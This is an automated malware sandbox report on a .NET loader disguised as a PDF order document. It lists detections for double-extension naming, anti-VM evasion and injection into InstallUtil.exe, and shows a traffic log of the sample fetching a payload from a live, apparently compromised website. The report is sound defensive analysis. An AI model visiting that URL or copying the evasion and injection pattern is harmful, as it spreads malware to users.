Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Ref SO14074.pdf.scr.exe

Overview

General Information

Sample name:Order Ref SO14074.pdf.scr.exe
Analysis ID:1565087
MD5:88329160bf478a825a9b4bcb310961ae
SHA1:a0114add19db1976a060a2d7a0d4e060870af88c
SHA256:1343dc8f69c1e9c3f2bea7148d3762d9adad251c7ddef7d577fa175841f0f314
Tags:exeuser-lowmal3
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Order Ref SO14074.pdf.scr.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe" MD5: 88329160BF478A825A9B4BCB310961AE)
    • InstallUtil.exe (PID: 5828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 6160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2208868060.00000000072B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: Order Ref SO14074.pdf.scr.exe PID: 5988JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: Order Ref SO14074.pdf.scr.exe PID: 5988JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: InstallUtil.exe PID: 5828JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.Order Ref SO14074.pdf.scr.exe.72b0000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Order Ref SO14074.pdf.scr.exeReversingLabs: Detection: 42%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: Order Ref SO14074.pdf.scr.exeJoe Sandbox ML: detected
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204903250.0000000007250000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: ((.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001498000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbM source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204903250.0000000007250000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdby5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n8C:\Windows\InstallUtil.pdbf source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\InstallUtil.pdb] source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbte source: InstallUtil.exe, 00000003.00000002.3263166855.0000000005A70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbR source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: &ulUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbU5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK5 source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001517000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbp source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbE source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259374096.0000000001358000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000003.00000002.3259501073.0000000001498000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbP source: InstallUtil.exe, 00000003.00000002.3259501073.00000000014CB000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 071999A5h0_2_071996D2
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 071999A5h0_2_071996E0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 07192E07h0_2_07192D99
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 07192E07h0_2_07192DA8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 07192E07h0_2_07193169
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 4x nop then jmp 071999A5h0_2_0719996E
              Source: global trafficHTTP traffic detected: GET /wp-includes/Lbvlxeqj.vdf HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /wp-includes/Lbvlxeqj.vdf HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
              Source: Order Ref SO14074.pdf.scr.exeString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Lbvlxeqj.vdf
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.5:49706 version: TLS 1.2

              System Summary

              barindex
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, ListController.csLarge array initialization: RedirectCustomizableController: array initializer size 361136
              Source: initial sampleStatic PE information: Filename: Order Ref SO14074.pdf.scr.exe
              Source: initial sampleStatic PE information: Filename: Order Ref SO14074.pdf.scr.exe
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0722B610 NtResumeThread,0_2_0722B610
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072290A8 NtProtectVirtualMemory,0_2_072290A8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0722B608 NtResumeThread,0_2_0722B608
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072290A0 NtProtectVirtualMemory,0_2_072290A0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_02A7CB3C0_2_02A7CB3C
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_02A7F3A80_2_02A7F3A8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_02A7F3B80_2_02A7F3B8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_065035900_2_06503590
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0650B9F00_2_0650B9F0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0650CE780_2_0650CE78
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_065035800_2_06503580
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_06503A700_2_06503A70
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_065022B00_2_065022B0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_065022A00_2_065022A0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0650B9E00_2_0650B9E0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_065029E80_2_065029E8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_070D0D8A0_2_070D0D8A
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_070D0D980_2_070D0D98
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_070D13180_2_070D1318
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071950700_2_07195070
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071996D20_2_071996D2
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071996E00_2_071996E0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719AD500_2_0719AD50
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719AD400_2_0719AD40
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719B3D00_2_0719B3D0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719996E0_2_0719996E
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071970380_2_07197038
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0719702E0_2_0719702E
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071900400_2_07190040
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A4B410_2_071A4B41
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A38480_2_071A3848
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A64B30_2_071A64B3
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071AAB080_2_071AAB08
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071AAAF80_2_071AAAF8
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A00060_2_071A0006
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071ABC570_2_071ABC57
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071A00400_2_071A0040
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_071ABC680_2_071ABC68
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07225C500_2_07225C50
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07228E280_2_07228E28
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0722C2B20_2_0722C2B2
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_07225C400_2_07225C40
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072400400_2_07240040
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072403670_2_07240367
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_072412480_2_07241248
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_0760E3E00_2_0760E3E0
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_075F00400_2_075F0040
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeCode function: 0_2_075F003B0_2_075F003B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_030E1B443_2_030E1B44
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_030E1B603_2_030E1B60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_030E51003_2_030E5100
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_030E51103_2_030E5110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1144
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204903250.0000000007250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2180049154.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2201347265.0000000006F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUfglcq.dll" vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000000.2006787162.0000000000994000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBgggjd.exe. vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKqgpduhwnn.exe" vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000003256000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKqgpduhwnn.exe" vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exeBinary or memory string: OriginalFilenameBgggjd.exe. vs Order Ref SO14074.pdf.scr.exe
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Order Ref SO14074.pdf.scr.exe, Luzpct.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, SortedRole.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, SortedRole.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.40c1f18.0.raw.unpack, ListController.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4535bd0.3.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.4495bb0.5.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.InstallUtil.exe.59d0000.6.raw.unpack, ErjUCovaB5nmnsZvVRe.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.Order Ref SO14074.pdf.scr.exe.7250000.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: classification engineClassification label: mal100.evad.winEXE@4/0@1/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:64:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0d6024d3-83b5-4db2-bf09-7149b61a179bJump to behavior
              Source: Order Ref SO14074.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Order Ref SO14074.pdf.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Order Ref SO14074.pdf.scr.exeReversingLabs: Detection: 42%
              Source: unknownProcess created: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe "C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe"
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1144
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
